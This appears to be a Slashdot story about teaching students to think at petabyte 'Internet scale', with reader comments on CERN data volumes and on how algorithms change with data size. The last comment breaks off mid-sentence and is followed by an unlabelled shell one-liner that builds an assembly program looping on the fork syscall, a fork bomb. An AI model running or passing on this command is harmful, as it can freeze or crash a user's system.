Getting Students To Think At Internet Scale
Hugh Pickens writes "The NY Times reports that researchers and workers in fields as diverse as biotechnology, astronomy, and computer science will soon find themselves overwhelmed with information — so the next generation of computer scientists will have to learn think in terms of Internet scale of petabytes of data. For the most part, university students have used rather modest computing systems to support their studies, but these machines fail to churn through enough data to really challenge and train young minds to ponder the mega-scale problems of tomorrow. 'If they imprint on these small systems, that becomes their frame of reference and what they're always thinking about,' said Jim Spohrer, a director at IBM's Almaden Research Center. This year, the National Science Foundation funded 14 universities that want to teach their students how to grapple with big data questions. Students are beginning to work with data sets like the Large Synoptic Survey Telescope, the largest public data set in the world. The telescope takes detailed images of large chunks of the sky and produces about 30 terabytes of data each night. 'Science these days has basically turned into a data-management problem,' says Jimmy Lin, an associate professor at the University of Maryland."
I worked for one of the detectors at CERN, and I strongly agree with the notion of Science being a data management problem. We (intend to :-) pull a colossal amount of data from the detectors (about 40 TB/sec in case of the experiment I was working for). Unsurprisingly, all of it can't be stored. There's a dedicated group of people whose only job is to make sure that only relevant information is extracted, and another small group whose only job is to make sure that all this information can be stored, accessed, and processed at large scales. In short, there is a lot that happens with the data before it is even seen by a physicist.
Having said that, I agree that very few people have a real appreciation and/or understanding of these kinds of systems and even fewer have the required depth of knowledge to build them. But this tends to be a highly specialized area, and I can't imagine it's easy to study it as a generic subject.
That's not true. The way you solve the problem changes radically depending on the amount of data you have. Consider
100 KB - You could use the dumbest algorithm imaginable and the slowest processor and everything is fine.
100 MB - most embedded systems can happily manage it. A desktop system can easily, even in a rather inefficient language. Algorithms are important.
100 GB - Big ass server - you'd definitely want to make sure you were using an efficient language and had an algorithm that scaled well, certainly to 2 processors and most likely to 4 processors. Probably should be 64 bit for efficiency.
100 PB+ You'd want a Google like system with lots of nodes. Actually I think at this point the code would look nothing like the 10 MB case. I remember someone saying that Google is "just a hash table". Now I think that misses the point. Google has invented things like Map/Reduce and has custom file systems. They've also spent a lot of time trying to cut costs by studying the effects of temperature on failure rates.
Now I think these guys are spouting buzzwords. But if you want to process 100PB of data on
echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;